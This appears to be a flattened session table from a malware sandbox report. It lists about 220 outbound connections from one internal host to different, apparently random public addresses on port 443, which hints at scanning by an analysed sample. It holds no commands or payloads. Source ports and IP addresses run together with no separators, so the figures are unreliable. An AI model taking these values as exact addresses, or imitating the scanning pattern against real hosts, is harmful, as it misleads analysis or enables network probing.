                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16145192.168.2.234398212.29.225.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16146192.168.2.2356950181.245.194.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16147192.168.2.235339620.238.129.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16148192.168.2.234858619.150.95.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16149192.168.2.2334252222.202.182.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16150192.168.2.2351784177.168.48.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16151192.168.2.2343604188.106.83.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16152192.168.2.2356000117.242.157.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16153192.168.2.2348902146.158.214.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16154192.168.2.2341862129.175.81.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16155192.168.2.233381871.18.113.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16156192.168.2.2335772119.137.19.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16157192.168.2.2343550116.48.236.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16158192.168.2.2341454149.47.187.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16159192.168.2.234488434.165.190.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16160192.168.2.23419102.30.190.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16161192.168.2.234828054.226.183.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16162192.168.2.2355064107.252.35.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16163192.168.2.235413274.91.242.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16164192.168.2.2334992108.210.148.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16165192.168.2.233314861.10.243.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16166192.168.2.235989486.213.135.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16167192.168.2.235147217.224.0.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16168192.168.2.234158688.122.184.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16169192.168.2.2350374114.210.178.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16170192.168.2.23393608.195.192.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16171192.168.2.236044217.91.33.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16172192.168.2.235238849.240.251.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16173192.168.2.235665844.118.177.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16174192.168.2.235084066.191.47.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16175192.168.2.235314283.200.55.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16176192.168.2.234434214.124.171.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16177192.168.2.236010036.68.175.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16178192.168.2.2345512124.194.52.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16179192.168.2.234921836.83.235.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16180192.168.2.23595529.194.98.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16181192.168.2.235348623.252.195.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16182192.168.2.2354378118.72.228.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16183192.168.2.236078836.4.37.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16184192.168.2.2342880220.144.40.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16185192.168.2.235788686.66.240.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16186192.168.2.233347896.92.108.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16187192.168.2.2342500154.66.111.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16188192.168.2.2356398168.116.3.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16189192.168.2.2354974206.66.17.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16190192.168.2.2333730116.31.162.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16191192.168.2.233321875.213.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192192.168.2.234281836.84.196.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16193192.168.2.2341250221.196.146.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16194192.168.2.233497644.58.112.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16195192.168.2.234232284.215.43.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16196192.168.2.235533680.8.254.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16197192.168.2.235270412.96.133.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16198192.168.2.2343130170.88.206.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16199192.168.2.233746884.45.110.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16200192.168.2.2349176210.34.83.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16201192.168.2.2335092166.105.190.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16202192.168.2.2334068194.13.224.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16203192.168.2.2356730164.195.97.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16204192.168.2.2346850153.153.23.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16205192.168.2.2358520162.214.84.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16206192.168.2.2352414203.230.147.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16207192.168.2.235657052.107.197.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16208192.168.2.2353620156.95.39.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16209192.168.2.2359036200.105.75.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16210192.168.2.2333404149.244.49.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16211192.168.2.23470088.20.34.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16212192.168.2.234521035.204.147.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16213192.168.2.2356922174.61.71.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16214192.168.2.234434457.62.102.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16215192.168.2.234918490.76.14.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16216192.168.2.23347748.223.58.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16217192.168.2.2352394130.35.194.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16218192.168.2.2356742136.111.231.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16219192.168.2.235254062.48.145.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16220192.168.2.2345010151.161.245.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16221192.168.2.235426669.75.1.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16222192.168.2.235351687.103.203.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16223192.168.2.234398648.88.43.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16224192.168.2.2359618160.205.78.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16225192.168.2.2335288221.173.215.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16226192.168.2.23431049.93.129.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16227192.168.2.2336422197.91.15.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16228192.168.2.2360506162.32.178.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16229192.168.2.2341036154.208.15.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16230192.168.2.2358374223.11.223.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16231192.168.2.235153253.104.29.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16232192.168.2.23331089.51.47.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16233192.168.2.2359456122.170.95.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16234192.168.2.2347592189.243.95.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16235192.168.2.2359608123.110.239.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16236192.168.2.2357740185.73.136.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16237192.168.2.233773234.229.141.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16238192.168.2.2346204155.13.140.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16239192.168.2.233598431.128.245.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16240192.168.2.2337414189.221.240.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16241192.168.2.2349220113.160.119.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16242192.168.2.2333062128.150.169.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16243192.168.2.2346696173.130.132.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16244192.168.2.233446257.123.135.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16245192.168.2.2335324104.159.55.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16246192.168.2.2347504111.15.21.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16247192.168.2.2353742163.39.19.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16248192.168.2.234408639.160.112.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16249192.168.2.2354866210.149.247.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16250192.168.2.2347706109.122.62.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16251192.168.2.2356014125.58.185.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16252192.168.2.2335762158.64.232.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16253192.168.2.2357136113.43.77.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16254192.168.2.2343892184.234.11.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16255192.168.2.2337014109.226.193.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16256192.168.2.2357738112.105.43.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16257192.168.2.2334546111.105.141.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16258192.168.2.2345186202.7.105.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16259192.168.2.2335546159.133.140.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16260192.168.2.2359094122.82.170.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16261192.168.2.2343276128.215.137.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16262192.168.2.2351284131.222.210.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16263192.168.2.2358596117.47.117.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16264192.168.2.2354016150.162.160.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16265192.168.2.233806250.164.11.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16266192.168.2.2355890211.152.94.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16267192.168.2.2352850171.4.50.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16268192.168.2.2345456150.228.139.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16269192.168.2.2357130147.157.124.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16270192.168.2.235933250.181.11.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16271192.168.2.2351160186.188.240.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16272192.168.2.233912674.13.33.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16273192.168.2.2357304104.186.223.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16274192.168.2.2341292170.159.202.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16275192.168.2.235272635.215.71.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16276192.168.2.233919250.191.122.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16277192.168.2.234605291.82.232.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16278192.168.2.2349324213.10.122.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16279192.168.2.2359334112.42.238.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16280192.168.2.2345040170.216.203.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16281192.168.2.235065273.202.125.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16282192.168.2.2344290138.220.222.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16283192.168.2.2347082121.68.169.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16284192.168.2.2341998170.243.12.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16285192.168.2.2350326109.115.2.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16286192.168.2.233655467.13.113.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16287192.168.2.2347044157.17.219.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16288192.168.2.2332806218.233.136.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16289192.168.2.2343206185.137.188.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16290192.168.2.234272239.115.219.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16291192.168.2.2350522180.244.172.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16292192.168.2.2342490218.4.249.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16293192.168.2.2348348218.52.9.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16294192.168.2.2333664126.165.234.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16295192.168.2.234884662.186.98.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16296192.168.2.235274869.127.241.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16297192.168.2.2360494132.65.187.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16298192.168.2.2344708126.85.39.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16299192.168.2.234927249.129.21.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16300192.168.2.234959213.212.90.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16301192.168.2.235093053.71.193.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16302192.168.2.2357168184.116.72.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16303192.168.2.234550250.80.120.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16304192.168.2.234805027.241.91.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16305192.168.2.2347960136.227.230.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16306192.168.2.2351028174.16.38.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16307192.168.2.2359212114.244.122.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16308192.168.2.2350712126.140.153.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16309192.168.2.234435417.59.29.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16310192.168.2.2345256212.39.81.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16311192.168.2.2333968185.130.18.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16312192.168.2.2359830201.211.31.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16313192.168.2.2348250148.249.191.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16314192.168.2.2350076132.242.123.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16315192.168.2.2351670199.154.232.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16316192.168.2.2356666196.43.168.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16317192.168.2.2337706121.153.22.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16318192.168.2.235703846.15.223.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16319192.168.2.23476304.197.42.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16320192.168.2.2334130187.212.27.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16321192.168.2.2340258184.241.72.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16322192.168.2.2341830135.166.139.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16323192.168.2.233652244.47.145.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16324192.168.2.2355128135.44.176.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16325192.168.2.23459062.248.67.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16326192.168.2.2350770153.134.194.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16327192.168.2.234996283.19.6.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16328192.168.2.234421425.145.124.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16329192.168.2.2351948137.55.95.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16330192.168.2.233579046.67.196.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16331192.168.2.234262264.105.178.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16332192.168.2.235525698.129.206.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16333192.168.2.2347474151.24.121.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16334192.168.2.233669835.207.122.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16335192.168.2.2344268208.18.215.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16336192.168.2.2347798155.172.79.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16337192.168.2.2359528202.185.162.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16338192.168.2.234042058.196.111.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16339192.168.2.235029087.134.184.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16340192.168.2.2333220183.112.71.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16341192.168.2.2336730142.118.133.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16342192.168.2.2345660120.212.94.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16343192.168.2.235852041.151.46.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16344192.168.2.2348146166.149.42.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16345192.168.2.236080224.117.91.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16346192.168.2.234308619.7.40.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16347192.168.2.2336008105.167.110.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16348192.168.2.233563489.237.88.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16349192.168.2.2341064173.29.25.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16350192.168.2.234285699.160.143.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16351192.168.2.2338418111.235.255.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16352192.168.2.2340768204.243.245.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16353192.168.2.23593381.152.0.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16354192.168.2.2357484138.119.28.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16355192.168.2.23343864.77.186.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16356192.168.2.234355613.155.241.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16357192.168.2.235556818.103.212.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16358192.168.2.235063839.135.64.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16359192.168.2.2340110178.148.52.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16360192.168.2.234080065.83.192.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16361192.168.2.2336296194.111.199.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16362192.168.2.2340822208.78.71.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16363192.168.2.2359976167.240.246.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16364192.168.2.235750872.23.69.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16365192.168.2.235220657.94.91.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
